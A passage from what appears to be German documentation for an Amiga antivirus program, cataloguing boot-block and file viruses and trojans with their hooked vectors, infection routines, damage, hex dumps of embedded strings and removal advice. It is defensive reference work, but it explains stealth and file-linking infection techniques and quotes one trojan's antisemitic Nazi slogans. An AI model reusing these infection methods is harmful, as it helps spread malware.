einer Fensterleiste: Virus-Checker V3.0 by usw Sucht c/Virus-Checker und schreibt Prg-Teile (falls gefunden) absolut nach $7C000. Versucht in einem anderen LW mit SubDir c Virus-Checker anzulegen (bei mir IMMER dann Filelaenge 0). Verraet sich durch DOS-Requester. Hinweis: Hallo Enforcer-Freunde. VT erzeugt hier beim Test einen weiteren Enforcer-Hit. ($6c=ZeroPage) Nachtrag: Stand 14.02.92 Leider haben mich einige Briefe erreicht, die darauf hin- weisen, dass Hardwareschaeden (sinnlose Werte s.o.) durch BP3 verursacht werden. Stellvertretend ein Auszug: ".... musste ich feststellen, dass der Steppermotor sich am Spindel- ende zur Laufwerksmitte festgedreht hatte.... ... drehte die Spindel mit der Spitzzange zurueck... ... das Laufwerk/Schreib-Lesekopf muss neu justiert werden." Es ist also im Amiga-Bereich jetzt auch der Punkt erreicht, dass Viren Hardwareschaeden verursachen koennen. NIE !!!!! eine unbe- kannte Disk starten. Nehmen Sie sich die Zeit und testen Sie die Disk mit einem AntiVirusProgramm ihrer Wahl durch !!! - Clone aufgetaucht. Filename FCheck Laenge gepackt: 1368 Bytes Laenge ungepackt: 2160 Bytes Text geaendert. Der geistige Tiefflug geht soweit, dass nicht er- kannt wurde, dass cmpi.l #"-che",(a0) in cmpi.l #"_Che" ge- aendert werden muesste. Es ist halt bei der Selbsterkennungs- routine ein kleiner Unterschied zwischen - _ und c C . Das Teil stammt nie und nimmer aus Bulgarien. 62726172 7900632f 56697275 735f4368 brary.c/Virus_Ch 65636b65 7200632f 56697275 735f4368 ecker.c/Virus_Ch 65636b65 72004275 6c676172 69616e20 ecker.Bulgarian 416e7469 6c616d65 7220616e 64205669 Antilamer and Vi 72696861 636b6572 20262043 7261636b rihacker & Crack 65722047 6d624800 2042554c 47415249 er GmbH. BULGARI 41000056 69727573 5f436865 636b6572 A..Virus_Checker 2056362e 34206279 204a6f68 6e205665 V6.4 by John Ve 6c647468 75697320 20004368 65636b69 ldthuis .Checki 6e672044 46303a20 466f7220 56697275 ng DF0: For Viru - BYTE VOYAGER I BB Kicktag, KickCheckSum, im Prg. DoIo und $6c immer ab $7F000, verschluesselt mit $DFF006 Decodiert ist im BB zu lesen: 4e751e49 Nu.I 6e666563 74656420 62792042 59544520 nfected by BYTE 564f5941 47455220 21212121 21000000 VOYAGER !!!!!... Vermehrung und Schäden (auch HD !!): Bootblock und schreibt in Block 880 "Infected by BYTE VOYAGER !!!!!" Der Text ist bei Disks der neue Diskname. Clone: STARCOM 3 Virus siehe unten - Byte Voyager II BB Kicktag, KickCheckSum, im Prg. DoIo und $6c immer ab $7F000, verschluesselt mit $DFF006 Vermehrung und Schäden (auch HD !!): Bootblock und schreibt in Block 880 "Another Virus by Byte Voyager" Der Text ist bei Disks der neue Diskname. - Byte Warrior (DASA) BB (KickV1.2) DoIo, KickTag, KickCheckSum erster BB-Virus, der verschluesselt wurde moegliches Ursprungsprogramm: ByteWarriorCreater gepackt: 6012 Bytes (TNM) ungepackt: 7360 Bytes Erzeugt mit FastMem NDOS-Disk Schreibt ohne FastMem ByteWarrior in Bootblock von DF1: Clone: Paramount, MAD 3, MAD 3b - C.E.-Vir-Inst Filename: Install Filelaenge: 11132 Bytes Soll C.E.-Virus aktivieren VT bietet loeschen an. - C.E.-Virus Cryptic Essence Link KS2.04: ja (verwendet Befehle (FreeVec), die erst ab dieser Vers. bekannt sind) Verbogener Vektor: DosWrite Nicht Resetfest Verlaengert File NICHT !!!!!!! Decodiert und Fileteile entpackt (!!!!), ist zu lesen: 43727970 74696320 45737365 Cryptic Esse 6e63652c 20a92031 39393520 4576696c nce, . 1995 Evil Ablauf: Das Teil linkt sich IN (!!!!!!) den 1.Hunk 1.Hunk mind. 9216 Bytes 3F3 = ausfuehrbar wird gefunden 3E9 = CodeHunk wird gefunden 4AFC am Hunkanfang (bis 4 Bytes tief) wird nicht gefunden (also keine Res-Struk. z.B. bei libs usw.) 3EC = RelocHunk wird gefunden. Das 1.Langwort des 1.Hunks wird durch 4EFA abcd (jmp Virus) er- setzt. Das VirusTeil codiert sich in Abhaengigkeit von $DFF006 usw. bei der Vermehrung. Die D- und A-Register wechseln. Sub und Add wechseln. NEU !!!!! Um die verseuchte Filelaenge gleich mit der Original-Filelaenge zu halten, werden Teile des Files gepackt !!!!!!!!!!!! Versuche haben gezeigt, dass auf meiner WB-Partition nur SEHR WENIGE Files ALLE Bedingungen erfuellen und dann verseucht werden. VT sollte das Teil im Speicher erkennen und abschalten. VT versucht ein verseuchtes File wieder in den Ursprungszustand zurueckzuversetzen. Das ist bei meinen Tests gelungen. Da aber nur SEHR WENIGE Files zum Test geeignet sind, MUSS das mit VT NICHT IMMER gelingen. Ueberlegen Sie bitte, das betroffene File neu auf- zuspielen. - cALLERSLOG.SFX Laenge:8428 siehe bei COP-Trojan Typ G - CallingCard-Trojan gegen BBS File Loeschen Laenge: 11368 Bytes A4000: ja KEINE verbogenen Vektoren KEINE Vermehrung Im File ist zu lesen (uncodiert): 4e754d43 49204361 6c6c696e 67436172 NuMCI CallingCar 64204861 636b6572 20627920 42795465 d Hacker by ByTe 25732f46 696e6c61 6e6420ae 31393935 %s/Finland .1995 0a0a0000 3f005573 6167653a 20257320 ....?.Usage: %s Wenn Sie SnoopDos starten, muessen Sie leider feststellen, dass nach BBS:user.data gesucht wird. Dieser Textstring liegt aber codiert im File. Also hat da jemand etwas zu verbergen. - Cameleon-Virus BB siehe bei Little Sven - Cascade-Virus BB Im Speicher immer ab $7E000 Cool $7E060, DoIo $C0, Vec5 $E0 (also beide in der ZeroPage) Fordert trackdisk.device NICHT Namensbegruendung: Am Ende des BBs ist zu lesen: Cascade V2.1CCount : Vermehrung: als BB z.B. linke Maustaste nicht gedrueckt Es werden 1 oder 2 Bloecke mit DoIo geladen DOS0-Kennung wird gefunden. Test auf "SCA ", "Casc", "ID92" Schaeden: a) Schreibt von $c0 bis $FF in die ZeroPage. Dies ist unter KS1.3 unschaedlich, da dieser Bereich NICHT vom Betriebs- system genutzt wird. Ab KS2.04 liegen da aber Vektoren. Da das Virusteil den Bereich vor dem Ueberschreiben nicht rettet, kann es zu einem Guru kommen. Cascade_ZeroPage 00b0: 00f80a94 00f80a96 00f80a98 00f80a9a ................ 00c0: 0c794ef9 0007e066 670c42b9 000006a4 .yN....fg.B..... 00d0: 4ef900f8 08084ef9 0007e072 43617363 N.....N....rCasc 00e0: 0c794ef9 0007e06c 670c42b9 000006a4 .yN....lg.B..... 00f0: 4ef900f8 17044ef9 0007e078 61646521 N.....N....xade! b) Sobald eine Zaehlzelle den Wert $DEC und eine andere Zaehl- zelle den Wert #5 erreicht hat wird mit graphic.lib der Maus- zeiger in eine Penis-Darstellung umgewandelt. Dies hat bei mir nur mit KS1.3 funktioniert. Mit KS2.04 habe ich sofort den Guru gesehen. Siehe auch Firedom.BB Virus = Clone - CBM-Virus BB nur KS1.2 MicroSystems-Clone s.u. nur Text geaendert. 79726967 68746564 20627920 62696720 yrighted by big 205d830c 436f6d6d 6f646f72 65204147 ]..Commodore AG - CCCP-Virus Cool, im Prg. Vec3, DoIo, Openwindow, NewOpenLib !!!! Erstes VirusPrg. das sich als BB und als Link vermehren kann !! KS1.3 ja KS2.04 ja Mehrfachlinks: ja Defekte Files: ja (Hunkstruktur defekt nur loeschen moeglich) im BB sichtbar: CCCP VIRUS Link: verlaengert ein File um 1044 Bytes Befaellt keine Prg.e in l (z.B.libs), d (z.B.devs), f (z.B.fonts). Clone: STARCOM 1 Virus, IRAK3 siehe unten - CCCP-TAI6-Clone Text geaendert: 70004e75 542e412e 492e2053 49584df8 p.NuT.A.I. SIXM. - CED-AMOS-Trojan Zerstoerung ???? Filename: CygnusEd Laenge: 53380 Bytes Nach FileID: Cygnus Editor Pro v4.0 HOT UPDATE! Nach Fremdaussage: Ein Zerstoerungsprogramm Bei mir endet jeder Aufruf auf allen meinen Rechnern (KS1.3-40.70), auch mit AMOS immer mit Guru. Ein CygnusEd ist es auf jeden Fall nicht. Vielmehr koennen Sie im File sehr haeufig Hinweise auf Amos lesen. Empfehlung deshalb: Loeschen - CED4-Trojan siehe bei CoP-Trojan - CENTURIONS anderer Name: THE SMILY CANCER siehe dort - CFP-Gefahr !!! Kein Virus ABER !!!!!!!!!!!!! Im 1.Hunk des Files ist zu lesen: 63292069 43415255 532f6469 56694445 c) iCARUS/diViDE Vorsicht !!!! Vorsicht !!!! Die meisten Antivirusprogramme finden Viren auch in gepackten Files. Anscheinend hat jemand die Erkennung von gepackten Files erschweren wollen, und hat deshalb ein Programm geschrieben, um den Antivirusprogrammen die Arbeit zu ERSCHWEREN. Es wird anscheinend ein Codeteil vor den Pack-Header geschrieben, der auch Text (siehe oben) enthaelt. Falls also VT so ein File meldet, ist EXTREME Vorsicht geboten. Das gepackte File koennte mit der Absicht veraendert sein, ein gefaehrliches Virusteil zu verbergen. Versuchen Sie UNBEDINGT einen Ausbau mit VT und pruefen Sie BITTE danach das File SEHR GENAU. Danke - Challenger trojanisches Pferd Keine Vektoren verbogen. Herkunft: FF622 challenger_d.main Laenge: 126336 Bytes Ablauf (vgl. Snoopdos): Sobald Sie das Spiel starten, wird ein Original-Setclock-Befehl (4884 Bytes) in SYS:devs/keymaps ange- legt und in a umbenannt. In c: wird ein neuer Setclock-Befehl angelegt: Laenge gepackt mit Imploder: 4884 (explode.lib) entpackt: 7344 Weiterhin wird in SYS:devs/keymaps noch ein File mit Namen rca angelegt: Laenge gepackt mit Imploder: 5328 (explode.lib) entpackt: 8388 Vermehrung: nur nach SYS: Der setclock-Befehl sollte in der startup-sequence stehen (ab KS2.04 NICHT mehr notwendig !!!). Deshalb rufen Sie bei jedem Boot-Vorgang auch diesen Befehl auf. Dies ist am 24. Juli eines Jahres gefaehrlich. An diesem Tag wird das File rca auch aufge- rufen. Es wird ein Text (schwarzer Hintergrund rote Schrift) ausgegeben und der Rechner blockiert. Guten Tag, hier ist der Guru Ihres Amiga-Computers. Laut Arbeitsvertrag habe ich das Recht auf einen Medita- tionstag pro Jahr. In meinem Fall ist das der 24. Juli jeden Jahres. Da wir heute dieses Datum schreiben, stehe ich Ihnen erst morgen wieder zur Verfügung. Bitte haben Sie Verständnis dafür, denn auch wir Gurus müssen einmal ausruhen. Es sind noch weitere Texte in rca vorhanden, aber die wurden bei mir nicht ausgegeben. Die Zerstoerung von Files wurde von mir nicht festgestellt. Empfehlung: entsprechende Files in c und keymaps loeschen und setclock von OrigWB-Disk neu nach c: kopieren. Arbeit mit VT: (getestet: 16.04.92) challenger_d.main wird geloescht c:setclock es wird ein rename mit devs/keymaps/a versucht. Falls nicht vorhanden, wird setclock allein geloescht. Sie muessen dann unter KS1.3 setclock von OrigWB-Disk neu kopieren devs/keymaps/rca wird geloescht. Hinweis Stand 16.06.94: BBS-Spiel GlobalWar Laenge 100136 Bytes In diesem Spiel wird im Moment von EINEM anderen AntiVirusProgramm das Challenger-Virus erkannt. Ich nehme an, dass diese Fehlerkennung beim naechsten Update dieses AntiVirusProgramms behoben sein wird. Richtig ist allerdings - Challenger-setmap entpackt (so kommt es aber im Original NICHT vor) - Challenger-rca entpackt (so kommt es aber im Original NICHT vor) - GlobalWar stimmen im ERSTEN Hunk bis auf Sprungbefehle sehr gut ueberein. Die Virustexte stehen aber bei Challenger im zweiten Hunk. GlobalWar sieht im Zweiten anders aus. Ob es sich beim ersten Hunk um eine veroeffentlichte Startup-Routine handelt, kann ich nicht beurteilen. Ich kann mir das aber nur so erklaeren, oder ????? - Chameleon-Virus BB siehe bei Little Sven - Chaos anderer Name: Taipan-Chaos Cool, DoIo BB codiert mit Wert aus $DFF006 Schaeden: Vermehrung mit BB sobald Zaehlzelle 8 erreicht hat: alle Blocks einer Disk werden mit unsinnigen Werten gefuellt, DisplayAlert: Chaos! by Tai-Pan usw. dann reset Herkunft: Virusinstall V2.0 - CHAOS-MASTER V0.5 File PP-Laenge: 12972, ungepackt:16676 Im ungepackten File ist zu lesen: 73696368 206a6574 7a74206d 69742043 sich jetzt mit C 48414f53 2d4d4153 54455220 56302e35 HAOS-MASTER V0.5 Filename wahrscheinlich: dir KEINE bekannten Vektoren verbogen, nicht resetfest Schaeden und Vermehrung: - dir-Befehl wird manchmal nicht ausgefuehrt. Ein kleines Fenster erscheint: Error xyz, Return-Gadget die Zahl xyz kann auch negativ sein und entspricht NICHT dem DOS-Error-Code. - Sie geben ein: dir df3: Das Inhaltsverzeichnis von df3 wird ausgegeben und das Virus-File nach df3:c/dir kopiert. Ein bereits vorhandener Dir-Befehl wird ueberschrieben. - Sie geben ein: dir prefs Das Inhaltsverzeichnis von prefs wird ausgegeben und ein File disk.info (Laenge:370 Bytes) nach prefs kopiert. Dieses File enthaelt am Anfang die Icon-Struktur. Der groessere Teil der Struktur ist durch Text ueberschrieben. Folge: Sie klicken die Prefs-Schublade an, disk.info muesste als Icon darge- stellt werden, geht aber nicht, da Struktur nicht in Ordnung. Also stellt der Computer die Arbeit ein. Reset wird notwendig. Text in disk.info: Sorry an alle User usw. - Sie geben ein: c/dir df3: Inhaltsverzeichnis wird ausgegeben und das Virus-File nach df3:c/r (!!!! Programmierfehler) geschrieben. Empfehlung: dir-Befehl loeschen (VT) und von OrigWB neu kopieren. - Charlie Braun anderer Name: Hireling Protector V1.0 ForpibClone s.u. nur Text geaendert - CHEATER HIJACKER BB auch KS2.04 LameBlame-Clone s.u. DisplayAlert-Text geaendert: -+= CHEATER HIJACKER usw. Wird auch erzeugt von VIRUS TERMINATOR V6.0 s.u. - Check File PP-crunched Laenge:18644 Process: HardDisk.device in C-Aztek Schaeden: alle 5 Min (delay $3a98) Bild (Totenkopf) und Sound fuer kurze Zeit. KEINE Vermehrungsroutine gefunden Soll wohl ein Gag sein. Solche Gags mag ich nicht. Es KANN bei der Suche nach dem Prozess zu einer Falschaussage von VT kommen, falls ein Hardwarehersteller fuer einen Kon- troller ein Device mit obengenannten Namen herausbringt oder herausgebracht hat. In diesem Fall bitte ich um einen Hinweis. Danke !!! - CheckMount-Trojan siehe bei WiREFACE Typ F - CHRISTMAS VIOLATOR Link Soll einen zusaetzlichen 1.Hunk erzeugen. Verlaengert File um 1060 Bytes Verwendet aufs Byte genau die IRQ-Linkroutine Braucht ExecBase im Speicher ab $C00000 Cool immer $7E07a, im Prg. OldOpenLib immer $7FB88 Nur mit KS1.3, da absoluter ROM-Einsprung. Programm liegt zweigeteilt ab $7E000 und $7FB84 im Speicher. Der Linkvorgang konnte NICHT erreicht werden, da im Programm MEHRERE Fehler vorliegen. Immer GURU 3. VT-Empfehlung: loeschen Namensbegruendung: Ein Programmteil, das NIE erreicht wird, decodiert mit eori.b #$27,(a1)+ ergibt: 203e3e3e >>> 20434852 4953544d 41532056 494f4c41 CHRISTMAS VIOLA 544f5220 62792074 68652044 7265616d TOR by the Dream 20546561 6d202d20 28484520 4845293c Team - (HE HE)< 3c3c2020 48617665 2061206e 69636520 << Have a nice 6461792e 2e2e2000 day... - CIRCLE OF POWER siehe bei NComm32-Trojan - Claas Abraham andere Namen: Abraham, MCA Cold, Cool, KickTag, KickCheckSum, $68 braucht FastRam !!!!! Angefordert mit #$4,d1 und AllocMem (Programmierfehler ????) im Prg.Ablauf erst BeginIo Vermehrung: ueber BB Schaden: nach $F-Resets Formatierung Eor-Byte wird fuer neuen BB aus $DFF006 erzeugt entschluesselt steht im Speicher: >>> Claas Abraham Virus !!! <<< Hinweis: Ein Kopier-Prg. erkennt den ORIGINAL-Turrican3-BB als Claas-Abraham-BB-Virus. Ich gehe davon aus, dass im naechsten Update die Fehlerkennung behoben ist. - Clist-Virus siehe bei Lamer-Clist-Virus anderer Name: U.K.LamerStyle oder Lame Style U.K. Der Name Lamerstyle ist fuer mich nicht nachvollziehbar, waehrend clist im Prg-Code vorkommt (s.u.). - clock-virus-Gag L: 7684 Bytes Filename:clockvirus (so hab ich das File ohne dok erhalten) Keine Vermehrung Nach meiner Meinung kann in der Uhr kein Virus sein. Empfehlung: Loeschen Im File ist zu lesen: Your clock was infected and is now cured! Your clock is healthy! You don't have a clock! - CLP-Trojan File Laenge ungepackt: 51000-52000 Bytes siehe auch bei UA62-ACP-Trojan, PHA Trojan Soll in CLP_WOW.exe sein. Wer das File hat, moege es mir BITTE zuschicken. Danke Ich habe KEIN lauffaehiges Virusfile. Nur GURU auf allen Maschinen und jeder KS . Keine verbogenen Vektoren. Keine Vermehrung Namensbegruendung: siehe Auszug Schaden: Soll in alle Files in S: einen Text schreiben. 62726172 7900533a 0049736e 27742043 brary.S:.Isn't C 55544520 4c495454 4c452050 4f4e4e49 UTE LITTLE PONNI 4553206a 75737420 61206e69 63652067 ES just a nice g 726f7570 213f2e2e 2e206861 68616861 roup!?... hahaha ;usw Clone: Anim_demo.exe Laenge: 1795068 Bytes !!!! gefunden in: kef_ani.lha Laenge: 179143 Bytes Es handelt sich NICHT um ein Intro, sondern am Ende steht 2x das CygnusEd Prof. 3.5 Prg. Es wurden 2 4EB9-4EF9-Links verwendet, um ein CLP-Teil anzu- haengen. Unterschiede: a) es soll nicht nach s: sondern nach BBS: gesucht werden. b) es wird der dR. WHo Text (s.u. bei UA62) verwendet. VT erkennt: CLP-Virus ??? VT bietet nur loeschen an. Begruendung: Das Teil ist NICHT lauffaehig. Der Source-Code von CLP-Trojan ist durch die Netze gewandert. Verstehe ich nicht so ganz. Dieser Source hatte MEHRERE Fehler. Genau die gleichen Fehler tauchen auch in diesem Prg auf. Bessert man die Fehler nach, so koennte Anim_demo.exe bei ge- nuegend Speicher und vorhandener BBS: Schaden anrichten. Die Groesse des Files ist in der Speicherreservierung fuer den Scan von BBS: begruendet. - CLP-MST-Trojan Laenge ungepackt: 51256 anderer Name: MST-VEC Virus, MST-Inte Virus Dieses Teil ist lauffaehig !!!!!!!!!! Keine verbogenen Vektoren Das File ist an Nichts angelinkt. Mir also unverstaendlich warum jemand das freiwillig aufrufen sollte ??? Schreibt in alle Files in s: einen Text PCD_ueberschrieben: 4655434b 20424f42 4f20414e 44204a45 FUCK BOBO AND JE 57495348 20415845 21205349 45472048 WISH AXE! SIEG H 45494c21 20474153 20524f4f 4c455a21 EIL! GAS ROOLEZ! 20424545 45415645 5253210a 61737369 BEEEAVERS!.assi 676e2066 726f6d3c 24243e3a 206f6672 gn from<$$>: ofr 6f6d3c24 243e3a0a 61737369 676e206f om<$$>:.assign o VT bietet fuer das trojanische Pferd und fuer die ueberschriebenen Files loeschen an. - COBRA-Virus BB Fastmem: Nein KS2.04: Nein BeginIo, KickTag, KickCheckSum, Exec IntVec 5 Namensbegruendung: 4E714E71 4E752043 4F425241 20484157 NqNqNu COBRA HAW 20484157 20484157 200041FA 002C3010 HAW HAW .Au'.,0. Schaeden und Vermehrung: BB VT kennt: 15.10.92 - CODER anderer Name: Coders Nightmare immer $7f600, DoIo, KickTag, KickCheckSum, $68 Fordert trackdisk.device NICHT im BB steht unverschluesselt: Bootblock installed with 'CODER' - The Ultimate Viruskiller!! Vermehrung: ueber BB im Speicher steht (entschluesselt mit ror.b #2,d1): Something WONDERFUL has happened!! Your Amiga is alive, and it is infected with the 'Coders Nightmare Virus'. - The ultimate key-killer, masterminded by the megamighty Mr. N of The Power Bomb Systems!! - Coders Nightmare anderer Name: CODER s.o. - COHEN-Virus BB HODEN-Virus-Clone s.u. Spritedaten geaendert. Verwendet NICHT mehr absoluten KS1.2 DoIo . Code teilweise um vier Bytes verschoben. Fordert trackdisk.device NICHT. Text im BB geaendert: 46726564 20436f68 656e202d 20556e69 Fred Cohen - Uni 76657273 69747920 536f7574 6865726e versity Southern 2043616c 69666f72 6e696120 31393839 California 1989 - Color Filevirus Laenge: 2196Bytes DoIo immer $70000, Cool belegt sinnlos 102400 Bytes ChipMem, taeuscht durch ein Graphik-Demo, schwarzer Hintergrund und drei Balken (rot, gruen, blau) und installiert gleichzeitig ab 70000 das Virusprogramm und ab 7F000 den Virus-BB (TURK). Veraendert die startup-s. NICHT. Schaeden: Bei DoIo-Einsprung wird der Virus-BB geschrieben. Bei Cool-Einsprung wird $5000 x TURK in den Speicher geschrieben. - ComKillerV1.6-Trojan siehe bei WIREFIRE-Trojan - COMMANDER-Virus Link Verlaengert ein File um 1664 Bytes KS1.3: ja Das Virusteil ist codiert in Abhaengigkeit von $DFF006 und $DFF007 . Textteile sind zweimal codiert, damit die Erkennung mit einem Speichermonitor erschwert wird. Das Teil meldet sich nicht. 2x decodiert ist im Speicher zu lesen: 434f4d4d 414e4445 5220293e 2d206279 COMMANDER )>- by 20427261 214e2042 6c615354 65722069 Bra!N BlaSTer i 6e203139 39340000 4448303a 432f4c6f n 1994..DH0:C/Lo 61645742 00004448 3000646f 732e6c69 adWB..DH0.dos.li 62726172 79007265 71746f6f 6c732e6c brary.reqtools.l 69627261 72792072 6571746f 6f6c7320 ibrary reqtools 33382e38 38380000 a0000000 00150000 38.888.......... Verbogene Vektoren 1: ExNext, Examine Aufgabe: Beide verbogenen Vektoren sollen die Erkennung des Virusteils ueber die Fileinfostruktur verhindern. Die Filelaenge und die Blockanzahl wird verringert. Das $A0 aus den SetComment-Bereich geloescht. Verbogene Vektoren 2: Open, Rename, Lock, LoadSeg, SetComment, Setprotection. Aufgabe: Sprung zur Linkroutine Ablauf im Speicher : Beim Einbau im Speicher wird zuerst ueber setcomment getestet, ob das Teil schon aktiv ist ($7419F1A2). Falls nein, wird nach einem Task DH0 gesucht. Falls gefunden, Suche nach DH0:C/LoadWB und verseuche. Dies er- klaert, warum auf verseuchten Festplatten meist auch LoadWB betroffen ist. Ablauf des Link-Vorgangs : Test ob : - File schon verseucht ($7419F1A2) - Filename beginnt nicht mit v oder V - Disk validated - File ist ausfuehrbar $3F3 - $3E9 wird gefunden - 1. Hunk ist nicht laenger als $1E00x4=$7800=#30720 Das Teil wird hinter den 1.Hunk gelinkt. Um den Einsprung in den Linkteil sicherzustellen, wird im Original- Hunk nach einer Bytefolge gesucht. Gesucht wird nach: $4EAE = jsr xy(a6) (es muss NICHT openlib sein) oder $6100 = bsr Diese Stelle wird ersetzt durch: $4EBAuvwx = jsr Virusbeginn. VT versucht den Original-Filezustand wieder herzustellen. Arbeiten Sie bitte mit einer Kopie. Wenn mehrere Files auf der Disk ver- seucht waren, empfehle ich ihnen eine Disk LANG zu formatieren und alle Files auf diese Disk zu kopieren. Die Disk-Struktur wird da- durch wieder geordnet. Die Disk wird schneller. VT versucht das Teil im Speicher zu erkennen. Bitte ueberlegen Sie unter KS1.3 ob nicht ein KReset sinnvoll waere. HINWEIS: !!!!!!!!!! Wenn Sie bei diesem Virusteil sogenannte "NutzPrge" mitlaufen lassen, die auch obengenannte Vektoren verbiegen, so finden Sie das Virusteil NIE !!!!!!!!!! Nachtrag 26.10.94: Es ist ein File "Kill" aufgetaucht. Laenge ungepackt: 2252 Bytes Dieses Prg soll den COMMANDER loeschen. Leider enthaelt dieses Prg einen KOMPLETTEN und LAUFFAEHIGEN (!!!!!) COMMANDER-Virusteil ab $1F0 im File. Dringende Empfehlung: sofort loeschen !!!! Nachtrag 25.11.94: Es ist ein neues File aufgetaucht: DENISTRO.EXE Laenge mit Text-Hunks und Commander-Virus 71800 Bytes Laenge ALLES ausgebaut 64844 Bytes Aeltere VT (z.B. VT2.68) haben das Teil aber schon mit Block- KetteTest gefunden. Wichtig: Der Commander-Teil hat sich NICHT ueber die Text-Hunks hinweggelinkt, sondern die Text-Hunks wurden DANACH angehaengt. VT2.69 meldet "Text-Hunk am Anfang" und bietet Ausbau an. In diesem Fall werden die Text-Hunks UND der Commander-Teil in einem Durchgang ausgebaut. Dies ist ein Sonderfall, da ja das File bekannt ist. Im Normalfall MUESSEN Sie nach dem Text-Hunk- Ausbau IMMER einen zweiten FileTest starten. Lesen Sie bitte bei Text-Hunk am Anfang nach. Danke Hinweis 01.95: Es gibt im Moment ein Antivirusprogramm, das die $6100-Variante erkennt und ausbaut. Leider ist der Ausbau FALSCH, da $4EAE zurueckgeschrieben wird anstatt $6100 . Die Lauffaehigkeit des Programms duerfen Sie NICHT erwarten. Hinweis: Das Virusteil haengt sich auch an Fonts (vgl. Helvetica 9), wenn die gesuchte Byteabfolge gefunden wird. Die Font-Struktur ist dann natuerlich unbrauchbar und das Teil kann sich ueber diesen Font NICHT vermehren. Versuchen Sie bitte einen Ausbau. Hinweis: Unter gewissen mir unbekannten Umstaenden soll sich das Virusteil auch an Files linken, deren 1.Hunk viel zu lang ist. Diese ver- seuchten Files sind dann NICHT lauffaehig, da ja der Sprungbefehl falsch ist. Ich mache Ihnen nicht viel Hoffnung, wenn das Virus- teil abgetrennt ist. Wenn Sie Erfahrung haben, koennen Sie mit einem Filemonitor nach 4ebauvwx suchen und dann probieren. Ob sich das lohnt ??? - Commander-cod. (codiert) Fundort z.B.: CD-HOTTEST5/PDSOFT/LIBRARY/DMS/DISK4241.DMS Es handelt sich um ein Demo, das aus zwei Disketten besteht. Textauszug: -+* My Mama Is a Vampire *+- ÐµP£Ø PrØdUçtIønS 1994 Version 3.0 Release date: 30 October 1994 ;..... Vicious of Duplo Gefaehrlich ist das File vampire.exe (L:875778) von Disk 1. Die Disk2 ist entgegen anderer Aussagen NICHT verseucht. Eine Meldung vampire2 ist verseucht, ist FALSCH. Sicherheitshalber sollten Sie aber beide Disks formatieren (LANG!!) Die Hunk-Struktur des Files war mir bis jetzt unbekannt. Am Fileende fehlt die 3F2-Kennung. Nachtrag: es handelt sich um eine SELTEN anzutreffende Overlay-File-Struktur. Fileauszug: 074f7665 726c6179 48e77ffe 267affe2 .OverlayH..&z.. ;...... 2d2d2d2d 2d2d0a0a 0d4e6f74 20656e6f ------...Not eno 75676820 6d656d6f 72792074 6f207374 ugh memory to st 61727420 564f532d 5368656c 6c212050 art VOS-Shell! P 726f6772 616d2074 65726d69 6e617465 rogram terminate ;usw. Falls Sie so etwas bei anderen Files mit dem Filemonitor sehen, sollten Sie SEHR vorsichtig werden. Die Gruppe Duplo scheint ihre Systeme NICHT virenfrei halten zu koen- nen. Dies zeigt sich am Vampire-Vorfall. Loeschen Sie der- artige Files. Sicher ist sicher !!!!! Das File besteht aus mehreren Einzelfiles, die nacheinander aktiviert werden. Die Einzelfiles sind mit -eori.b- codiert. Deshalb wurde der Commander-Virus beim Filetest und beim BlockKetteTest nicht entdeckt. In diesem File ist der Commander-Virus NUR 7x enthalten. Bil- den Sie sich Ihre eigene Meinung von der Gruppe Duplo !!! Im File 1x bei $C502.... 7x bei $CF508. Wenn Sie das selbst nachvollziehen wollen, nehmen Sie bitte nicht das Langwort bei $C502, sondern das Langwort bei $C506 zum Suchen mit einem Filemonitor. VT bietet nur Loeschen an. Wichtiger Hinweis !!!!! Auf einem A2000 mit 68030 kommt ein GURU . (AGA fehlt) ABER !!!!!! Vorher wurde schon DH0:c/loadwb verseucht !!!! Nach einem RESET wurde die Platte validiert UND danach das Virusteil dank loadwb sofort aktiviert !!!! - Commodore-Virus File Laenge:1752 reines Zerstoerungsprogramm KEINE Vermehrung, also nach Definition kein Virus. Unter welchem Namen das Programm weitergegeben wird, ist mir nicht bekannt. Als VirusTestPrg ???? siehe unten . NICHT resetfest. Namensbegruendung: 20210054 68697320 69732074 6865206E !.This is the n 65772043 6F6D6D6F 646F7265 2D566972 ew Commodore-Vir 75732021 00425920 53544152 4C494748 us !.BY STARLIGH 5420454E 54455250 52495345 53203139 T ENTERPRISES 19 39320000 92 Verbiegt Cool auf eigenen Programmtext (Schwachsinn), also voellig unsinnig. Da ausserdem allocmem nicht benutzt wird, wird nach Programmende der Speicher von einem beliebigen anderen Programm benutzt, d.h. der Cool-Vektor zeigt auf irgendetwas, nur nicht auf den gewuenschten Text, weil dieser ja laengst ueberschrieben ist. VT erkennt beim Cool-Vektor-Test deshalb nur unbe- kanntes Programm. Gehen Sie Weiter und loeschen Sie den Vektor in VT/Tools. Danke Legt eine Zaehlzelle bei $66666 an, OHNE allocmem. Schreibt auch einen anderen Wert ins RangerRAM ($C0). Da auch der Text "dos.library" 3x im Programm vorkommt und aufgerufen wird, draengt sich der Verdacht auf, dass ein Anfaenger 3 Assemblerkursteile zusammengesetzt hat. Abhaengig von Zaehlzelle: DisplayAllert: (Zelle=2) 00961420 20204968 7220436F 6D707574 ... Ihr Comput 65722069 737420DC 62657268 69747A74 er ist überhitzt 20212121 0001007D 2D57656E 6E206573 !!!...}-Wenn es 206E6163 68206465 6D205265 73657420 nach dem Reset 65696E20 61627374 75727A20 67696274 ein absturz gibt 000100AA 46202053 4348414C 54454E20 ...S SCHALTEN 49484E20 53494520 42495454 45204155 IHN SIE BITTE AU 53000100 D7552020 20436F6D 6D6F646F S...xU Commodo 72652031 39383700 re 1987. oder Textausgabe: (Zelle=3) 0000636F 6E3A3130 2F31302F 3333302F ..con:10/10/330/ 35302F52 45515545 53542000 9B316D9B 50/REQUEST ..1m. 33336D20 4B45494E 20564952 55532049 33m KEIN VIRUS I 4E204452 49564520 4446303A 20200A20 N DRIVE DF0: . 20202020 20204745 46554E44 454E2021 GEFUNDEN ! 21202020 ! Schaeden: - loescht startup-sequence - schreibt leeres Unterverzeichnis Name: Commodore war hier !! Erkennung im Speicher mit VT: nicht moeglich (siehe oben) File-Erkennung mit VT getestet: 26.09.92 Empfehlung: einfach loeschen und gegebenenfalls in s-sequence nachschauen, ob geloeschter Programmname dort auftaucht. Dann bitte diese Zeile mit ED loeschen. - CompuPhagozyte File Laenge ungepackt: 1452 keine Vektoren verbogen sichtbar z.B.: The CompuPhagozyte usw. Erstellt eine Fensterleiste mit dem Text: Virus-Checker V4.0 by ... (Name) Verraet sich, wenn Sie die Fensterleiste anklicken, weil im Gegensatz zum echten Virus-Checker NICHTS passiert. Wartet auf CloseWindow und DiskInserted. Schaeden: Solange die Fensterleiste da 